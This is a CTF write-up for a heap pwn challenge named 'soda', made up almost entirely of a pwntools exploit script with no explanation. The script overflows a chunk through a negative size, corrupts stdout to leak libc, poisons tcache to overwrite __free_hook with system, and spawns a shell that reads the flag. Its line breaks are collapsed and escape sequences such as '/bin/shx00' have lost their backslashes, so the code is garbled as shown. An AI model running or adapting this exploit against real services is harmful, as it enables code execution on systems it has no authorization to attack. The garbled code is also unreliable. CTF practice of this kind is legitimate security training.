【迎中秋】公开赛writeup｜Pwn-soda

#!/usr/bin/env python# -*- coding: utf-8 -*-import sysimport osfrom pwn import *context.log_level = 'debug'
binary = './soda'elf = ELF('./soda')libc = ELF("./libc.so.6")context.binary = binary
DEBUG = 0if DEBUG:  p = process(binary)  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})else:  host = "127.0.0.1"  port =  9999  p = remote(host,port)if DEBUG == 2:  host = ""  port = 0  user = ""  passwd = ""  p = ssh(host,port,user,passwd)l64 = lambda      :u64(p.recvuntil("x7f")[-6:].ljust(8,"x00"))l32 = lambda      :u32(p.recvuntil("xf7")[-4:].ljust(4,"x00"))sla = lambda a,b  :p.sendlineafter(str(a),str(b))sa  = lambda a,b  :p.sendafter(str(a),str(b))lg  = lambda name,data : p.success(name + ": 0x%x" % data)se  = lambda payload: p.send(payload)rl  = lambda      : p.recv()sl  = lambda payload: p.sendline(payload)ru  = lambda a     :p.recvuntil(str(a))def cmd(idx):  sla(">> ",str(idx))def add(size,payload):  cmd(1)  sla(":n",str(size))  sa(":n",payload)def free(idx):  cmd(2)  sla(":n",str(idx))def free1(idx):  cmd(2)  sla(":",str(idx))def add1(size,payload):  cmd(1)  sla(":",str(size))  sa(":",payload)def exp():  add(0x18,"aaaa")  add(0xff,'aaaa')  free(1)  add(0xf0,"aaaa")  free(1)  add(0xe0,"aaaa")  free(1)  add(0xd0,'aaaa')  free(1)  add(0xc0,"aaaa")  free(1)  add(0xb0,"aaaa")  free(1)  free(0)  add(0xff,"aaa")  #chunk overflow  add(str(-1),"a"*0x18+p64(0x4b1))  free(0)  add(0xff,"aaa")  add(0x38,p16(0x2720))  # gdb.attach(p)  free(1)  add(0xf0,"aaa")  #leak libc_base  add(0xf0,p64(0xfbad1800)+p64(0)*3+p8(0x88))  libc_base = l64()-libc.sym["_IO_2_1_stdin_"]  lg("libc_base",libc_base)  #tcache attrack  free1(0)  free1(1)  free1(2)  add1(0x38,p64(libc_base+libc.sym["__free_hook"]))  add1(0x38,"/bin/shx00")  add1(0x38,p64(libc_base+libc.sym["system"]))  free1(1)  p.sendline("cat flag")  p.interactive()while True:    p = remote(host,port)    try:        exp()    except:        p.close()